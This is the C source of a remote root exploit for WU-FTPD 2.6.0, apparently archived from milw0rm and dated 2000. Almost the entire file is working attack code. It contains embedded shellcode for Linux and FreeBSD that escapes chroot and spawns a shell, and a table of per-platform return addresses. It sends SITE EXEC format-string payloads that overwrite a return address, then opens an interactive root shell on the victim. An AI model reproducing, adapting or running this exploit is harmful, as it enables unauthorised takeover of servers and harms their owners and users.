545 lines
No EOL
11 KiB
C
545 lines
No EOL
11 KiB
C
/*
|
|
* (c) 2000 venglin / b0f
|
|
* http://b0f.freebsd.lublin.pl
|
|
*
|
|
* WUFTPD 2.6.0 REMOTE ROOT EXPLOIT (22/06/2000, updated: 05/08/2000)
|
|
*
|
|
* Idea and preliminary version of exploit by tf8
|
|
*
|
|
* Greetz: Lam3rZ, TESO, ADM, lcamtuf, karpio.
|
|
* Dedicated to ksm.
|
|
*
|
|
* **PRIVATE**DO*NOT*DISTRIBUTE**
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <stdarg.h>
|
|
#include <string.h>
|
|
#include <sys/types.h>
|
|
#include <sys/socket.h>
|
|
#include <netinet/in.h>
|
|
#include <netdb.h>
|
|
#include <unistd.h>
|
|
#include <arpa/inet.h>
|
|
|
|
|
|
#define repln if (getreply(0) < 0) return -1
|
|
#define replv if (getreply(1) < 0) return -1
|
|
|
|
#ifdef DEBUG
|
|
#define repl replv
|
|
#else
|
|
#define repl repln
|
|
#endif
|
|
|
|
char usage[] = "usage: bobek [-l login] [-o port] [-f retofs] [-s retlocofs]\n\t<-t type> <hostname>";
|
|
char recvbuf[BUFSIZ], sendbuf[BUFSIZ];
|
|
FILE *cin, *cout;
|
|
|
|
char linuxcode[]= /* Lam3rZ chroot() code */
|
|
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
|
|
"\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31"
|
|
"\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\x01\xb0\x27\xcd"
|
|
"\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31\xdb"
|
|
"\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e"
|
|
"\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09"
|
|
"\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8\x88"
|
|
"\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89"
|
|
"\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0\x31"
|
|
"\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\x30\x62\x69\x6e"
|
|
"\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e\x67\x6c\x69"
|
|
"\x6e\x40\x6b\x6f\x63\x68\x61\x6d\x2e\x6b\x61\x73\x69\x65"
|
|
"\x2e\x63\x6f\x6d";
|
|
|
|
char bsdcode[] = /* Lam3rZ chroot() code rewritten for FreeBSD by venglin */
|
|
"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43"
|
|
"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0"
|
|
"\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\x01\x53\x53\xb0\x88"
|
|
"\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80\x31"
|
|
"\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31"
|
|
"\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75\xf1"
|
|
"\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd\x80"
|
|
"\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46\x07"
|
|
"\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
|
|
"\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53\x53"
|
|
"\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\x30\x62\x69\x6e\x30"
|
|
"\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e\x67\x6c\x69\x6e"
|
|
"\x40\x6b\x6f\x63\x68\x61\x6d\x2e\x6b\x61\x73\x69\x65\x2e"
|
|
"\x63\x6f\x6d";
|
|
|
|
struct platforms
|
|
{
|
|
char *os;
|
|
char *version;
|
|
char *code;
|
|
int align;
|
|
int eipoff;
|
|
long ret;
|
|
long retloc;
|
|
int sleep;
|
|
};
|
|
|
|
struct platforms targ[] =
|
|
{
|
|
{ "FreeBSD 3.4-STABLE", "2.6.0-ports", bsdcode, 2, 1024, 0x80b1f10, 0xbfbfcc04, 0 },
|
|
{ "FreeBSD 5.0-CURRENT", "2.6.0-ports", bsdcode, 2, 1024, 0x80b1510, 0xbfbfec0c, 0 },
|
|
{ "FreeBSD 3.4-STABLE", "2.6.0-packages", bsdcode, 2, 1024, 0x80b1510, 0xbfbfe798, 0 },
|
|
{ "FreeBSD 3.4-STABLE", "2.6.0-venglin", bsdcode, 2, 1024, 0x807078c, 0xbfbfcc04, 0 },
|
|
{ "RedHat Linux 6.2", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffcf74, 0 },
|
|
{ "RedHat Linux 6.2", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffd074, 0 },
|
|
{ "RedHat Linux 6.2", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffcf84, 0 },
|
|
{ "RedHat Linux 6.2", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffd04c, 0 },
|
|
{ "RedHat Linux 6.2-SMP", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffd0e4, 0 },
|
|
{ NULL, NULL, NULL, 0, 0, 0, 0 }
|
|
};
|
|
|
|
long getip(name)
|
|
char *name;
|
|
{
|
|
struct hostent *hp;
|
|
long ip;
|
|
extern int h_errno;
|
|
|
|
if ((ip = inet_addr(name)) < 0)
|
|
{
|
|
if (!(hp = gethostbyname(name)))
|
|
{
|
|
fprintf(stderr, "gethostbyname(): %s\n",
|
|
strerror(h_errno));
|
|
exit(1);
|
|
}
|
|
memcpy(&ip, (hp->h_addr), 4);
|
|
}
|
|
|
|
return ip;
|
|
}
|
|
|
|
int connecttoftp(host, port)
|
|
char *host;
|
|
int port;
|
|
{
|
|
int sockfd;
|
|
struct sockaddr_in cli;
|
|
|
|
bzero(&cli, sizeof(cli));
|
|
cli.sin_family = AF_INET;
|
|
cli.sin_addr.s_addr=getip(host);
|
|
cli.sin_port = htons(port);
|
|
|
|
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
|
|
{
|
|
perror("socket");
|
|
return -1;
|
|
}
|
|
|
|
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
|
|
{
|
|
perror("connect");
|
|
close(sockfd);
|
|
return -1;
|
|
}
|
|
|
|
cin = fdopen(sockfd, "r");
|
|
cout = fdopen(sockfd, "w");
|
|
|
|
if (!cin || !cout)
|
|
{
|
|
close(sockfd);
|
|
return -1;
|
|
}
|
|
|
|
return sockfd;
|
|
}
|
|
|
|
int command(const char *fmt, ...)
|
|
{
|
|
char buf1[BUFSIZ], buf2[BUFSIZ*2], *p, *q;
|
|
|
|
va_list args;
|
|
|
|
if (!cout)
|
|
return -1;
|
|
|
|
bzero(buf1, BUFSIZ);
|
|
bzero(buf2, BUFSIZ*2);
|
|
|
|
va_start(args, fmt);
|
|
vsnprintf(buf1, BUFSIZ, fmt, args);
|
|
va_end(args);
|
|
|
|
for (p=buf1,q=buf2;*p;p++,q++)
|
|
{
|
|
if (*p == '\xff')
|
|
{
|
|
*q++ = '\xff';
|
|
*q = '\xff';
|
|
}
|
|
else
|
|
*q = *p;
|
|
}
|
|
|
|
fprintf(cout, "%s", buf2);
|
|
|
|
#ifdef DEBUG
|
|
fprintf(stderr, "--> ");
|
|
fprintf(stderr, "%s", buf2);
|
|
fputc('\n', stderr);
|
|
#endif
|
|
|
|
fputs("\r\n", cout);
|
|
(void)fflush(cout);
|
|
return 0;
|
|
}
|
|
|
|
int getreply(v)
|
|
int v;
|
|
{
|
|
if (!(fgets(recvbuf, BUFSIZ, cin)))
|
|
return -1;
|
|
|
|
if (v)
|
|
fprintf(stderr, "<-- %s", recvbuf);
|
|
|
|
return 0;
|
|
}
|
|
|
|
int logintoftp(login, passwd)
|
|
char *login, *passwd;
|
|
{
|
|
do
|
|
repl;
|
|
while (strncmp(recvbuf, "220 ", 4));
|
|
|
|
if ((command("USER %s", login)) < 0)
|
|
return -1;
|
|
|
|
repl;
|
|
|
|
if (strncmp(recvbuf, "331", 3))
|
|
{
|
|
puts(recvbuf);
|
|
return -1;
|
|
}
|
|
|
|
if ((command("PASS %s", passwd) < 0))
|
|
return -1;
|
|
|
|
do
|
|
repl;
|
|
while (strncmp(recvbuf, "230 ", 4));
|
|
|
|
return 0;
|
|
}
|
|
|
|
int checkvuln(void)
|
|
{
|
|
command("SITE EXEC %%p");
|
|
repl;
|
|
|
|
if(strncmp(recvbuf, "200-", 4))
|
|
return -1;
|
|
|
|
if(strncmp(recvbuf+4, "0x", 2))
|
|
return -1;
|
|
|
|
repl;
|
|
|
|
return 0;
|
|
}
|
|
|
|
int findeip(eipoff, align)
|
|
int eipoff, align;
|
|
{
|
|
int i, j, off;
|
|
char *p1;
|
|
char eip1[10], eip2[10];
|
|
|
|
for (i=eipoff;;i+=8)
|
|
{
|
|
fprintf(stderr, "at offset %d\n", i);
|
|
strcpy(sendbuf, "SITE EXEC ");
|
|
|
|
for (j=0;j<align;j++) strcat(sendbuf, "a");
|
|
strcat(sendbuf, "abcd");
|
|
|
|
for (j=0;j<eipoff/8;j++) strcat(sendbuf, "%%.f");
|
|
for (j=0;j<(i-eipoff)/8;j++) strcat(sendbuf, "%%d%%d");
|
|
strcat(sendbuf, "|%%.8x|%%.8x");
|
|
|
|
if (command(sendbuf) < 0)
|
|
return -1;
|
|
|
|
repl;
|
|
|
|
if (!(p1 = strchr(recvbuf, '|')))
|
|
return -1;
|
|
|
|
strncpy(eip1, p1+1, 8);
|
|
strncpy(eip2, p1+10, 8);
|
|
|
|
eip1[8] = eip2[8] = '\0';
|
|
|
|
if (!(strcmp(eip1, "64636261")))
|
|
{
|
|
off = i;
|
|
break;
|
|
}
|
|
|
|
if (!(strcmp(eip2, "64636261")))
|
|
{
|
|
off = i + 4;
|
|
break;
|
|
}
|
|
|
|
repl;
|
|
}
|
|
|
|
repl;
|
|
|
|
return off;
|
|
}
|
|
|
|
char *putshell(type)
|
|
int type;
|
|
{
|
|
static char buf[400];
|
|
int noplen;
|
|
|
|
char *code = targ[type].code;
|
|
|
|
noplen = sizeof(buf) - strlen(code) - 2;
|
|
|
|
memset(buf, 0x90, noplen);
|
|
buf[noplen+1] = '\0';
|
|
strcat(buf, code);
|
|
|
|
return buf;
|
|
}
|
|
|
|
int overwrite(ptr, off, align, retloc, eipoff)
|
|
long ptr, retloc;
|
|
int off, align, eipoff;
|
|
{
|
|
int i, size = 0;
|
|
char buf[100];
|
|
|
|
fprintf(stderr, "RET: %p, RET location: %p,"
|
|
" RET location offset on stack: %d\n",
|
|
(void *)ptr, (void *)retloc, off);
|
|
|
|
if (off >= 12)
|
|
{
|
|
|
|
strcpy(sendbuf, "SITE EXEC ");
|
|
|
|
for (i=0;i<eipoff/8;i++) strcat(sendbuf, "%%.f");
|
|
for (i=0;i<(off-eipoff-8)/8;i++) strcat(sendbuf, "%%d%%d");
|
|
|
|
if (((off-eipoff-8) % 8) != 0) strcat(sendbuf, "%%d%%d");
|
|
|
|
if (command(sendbuf) < 0)
|
|
return -1;
|
|
|
|
repl;
|
|
|
|
size = strlen(recvbuf+4) - 2;
|
|
|
|
repl;
|
|
}
|
|
|
|
fprintf(stderr, "Reply size: %d, New RET: %p\n", size,
|
|
(void *)(ptr-size));
|
|
|
|
strcpy(sendbuf, "SITE EXEC ");
|
|
for (i=0;i<align;i++) strcat(sendbuf, "a");
|
|
|
|
sprintf(buf, "%c%c%c%c", ((int)retloc & 0xff),
|
|
(((int)retloc & 0xff00) >> 8),
|
|
(((int)retloc & 0xff0000) >> 16),
|
|
(((int)retloc & 0xff000000) >> 24));
|
|
|
|
strcat(sendbuf, buf);
|
|
|
|
for (i=0;i<eipoff/8;i++) strcat(sendbuf, "%%.f");
|
|
for (i=0;i<(off-eipoff-8)/8;i++) strcat(sendbuf, "%%d%%d");
|
|
|
|
if (((off-eipoff-8) % 8) != 0) strcat(sendbuf, "%%d%%d");
|
|
|
|
strcat(sendbuf, "%%.");
|
|
sprintf(buf, "%d", (int)ptr-size);
|
|
strcat(sendbuf, buf);
|
|
strcat(sendbuf, "d%%n");
|
|
|
|
if (command(sendbuf) < 0)
|
|
return -1;
|
|
|
|
return 0;
|
|
}
|
|
|
|
int sh(sockfd)
|
|
int sockfd;
|
|
{
|
|
char buf[BUFSIZ];
|
|
int c;
|
|
fd_set rf, drugi;
|
|
char cmd[] = "uname -a ; pwd ; id\n";
|
|
|
|
FD_ZERO(&rf);
|
|
FD_SET(0, &rf);
|
|
FD_SET(sockfd, &rf);
|
|
write(sockfd, cmd, strlen(cmd));
|
|
|
|
while (1)
|
|
{
|
|
bzero(buf, BUFSIZ);
|
|
memcpy (&drugi, &rf, sizeof(rf));
|
|
select(sockfd+1, &drugi, NULL, NULL, NULL);
|
|
if (FD_ISSET(0, &drugi))
|
|
{
|
|
c = read(0, buf, BUFSIZ);
|
|
send(sockfd, buf, c, 0x4);
|
|
}
|
|
|
|
if (FD_ISSET(sockfd, &drugi))
|
|
{
|
|
c = read(sockfd, buf, BUFSIZ);
|
|
if (c<0) return 0;
|
|
write(1,buf,c);
|
|
}
|
|
}
|
|
}
|
|
|
|
int main(argc, argv)
|
|
int argc;
|
|
char **argv;
|
|
{
|
|
extern int optind, opterr;
|
|
extern char *optarg;
|
|
int ch, type, port, eipoff, fd, retofs, retlocofs, align, i, retoff;
|
|
long ret, retloc;
|
|
char login[BUFSIZ], password[BUFSIZ];
|
|
|
|
opterr = retofs = retlocofs = 0;
|
|
strcpy(login, "ftp");
|
|
type = -1;
|
|
port = 21;
|
|
|
|
while ((ch = getopt(argc, argv, "l:f:s:t:o")) != -1)
|
|
switch((char)ch)
|
|
{
|
|
case 'l':
|
|
strcpy(login, optarg);
|
|
break;
|
|
|
|
case 't':
|
|
type = atoi(optarg);
|
|
break;
|
|
|
|
case 'o':
|
|
port = atoi(optarg);
|
|
break;
|
|
|
|
case 'f':
|
|
retofs = atoi(optarg);
|
|
break;
|
|
|
|
case 's':
|
|
retlocofs = atoi(optarg);
|
|
break;
|
|
|
|
case '?':
|
|
default:
|
|
puts(usage);
|
|
exit(0);
|
|
}
|
|
|
|
argc -= optind;
|
|
argv += optind;
|
|
|
|
fprintf(stderr, "PanBobek v1.1 by venglin@freebsd.lublin.pl\n\n");
|
|
|
|
if (type < 0)
|
|
{
|
|
fprintf(stderr, "Please select platform:\n");
|
|
for (i=0;targ[i].os;i++)
|
|
{
|
|
fprintf(stderr, "\t-t %d : %s %s (%p / %p)\n", i,
|
|
targ[i].os, targ[i].version,
|
|
(void *)targ[i].ret,
|
|
(void *)targ[i].retloc);
|
|
}
|
|
exit(0);
|
|
}
|
|
|
|
fprintf(stderr, "Selected platform: %s with WUFTPD %s\n\n",
|
|
targ[type].os, targ[type].version);
|
|
|
|
eipoff = targ[type].eipoff;
|
|
align = targ[type].align;
|
|
ret = targ[type].ret;
|
|
retloc = targ[type].retloc;
|
|
retloc += retlocofs;
|
|
ret += retofs;
|
|
|
|
if (argc != 1)
|
|
{
|
|
puts(usage);
|
|
exit(0);
|
|
}
|
|
|
|
strcpy(password, putshell(type));
|
|
|
|
if ((fd = connecttoftp(*argv, port)) < 0)
|
|
{
|
|
(void)fprintf(stderr, "Connection to %s failed.\n", *argv);
|
|
exit(1);
|
|
}
|
|
|
|
(void)fprintf(stderr, "Connected to %s. Trying to log in.\n", *argv);
|
|
|
|
if (logintoftp(login, password) < 0)
|
|
{
|
|
(void)fprintf(stderr, "Logging in to %s (%s) failed.\n",
|
|
*argv, login);
|
|
exit(1);
|
|
}
|
|
|
|
(void)fprintf(stderr, "Logged in as %s. Checking vulnerability.\n",
|
|
login);
|
|
|
|
sleep(targ[type].sleep);
|
|
|
|
if (checkvuln() < 0)
|
|
{
|
|
(void)fprintf(stderr, "Sorry, this version isn't"
|
|
" vulnerable or uses internal vsnprintf().\n");
|
|
exit(1);
|
|
}
|
|
|
|
(void)fprintf(stderr, "Ok, trying to find offset (initial: %d)\n",
|
|
eipoff);
|
|
|
|
if ((retoff = findeip(eipoff, align)) < 0)
|
|
{
|
|
(void)fprintf(stderr, "\nError finding offset. Adjust"
|
|
" align.\n");
|
|
exit(1);
|
|
}
|
|
|
|
if (overwrite(ret, retoff, align, retloc, eipoff) < 0)
|
|
{
|
|
(void)fprintf(stderr, "Error overwriting RET addr.\n");
|
|
exit(1);
|
|
}
|
|
|
|
fprintf(stderr, "Wait up to few minutes for reply. It depends on "
|
|
"victim's CPU speed.\nEnjoy your shell.\n");
|
|
|
|
sh(fd);
|
|
|
|
exit(0);
|
|
}
|
|
|
|
|
|
// milw0rm.com [2000-11-21]
|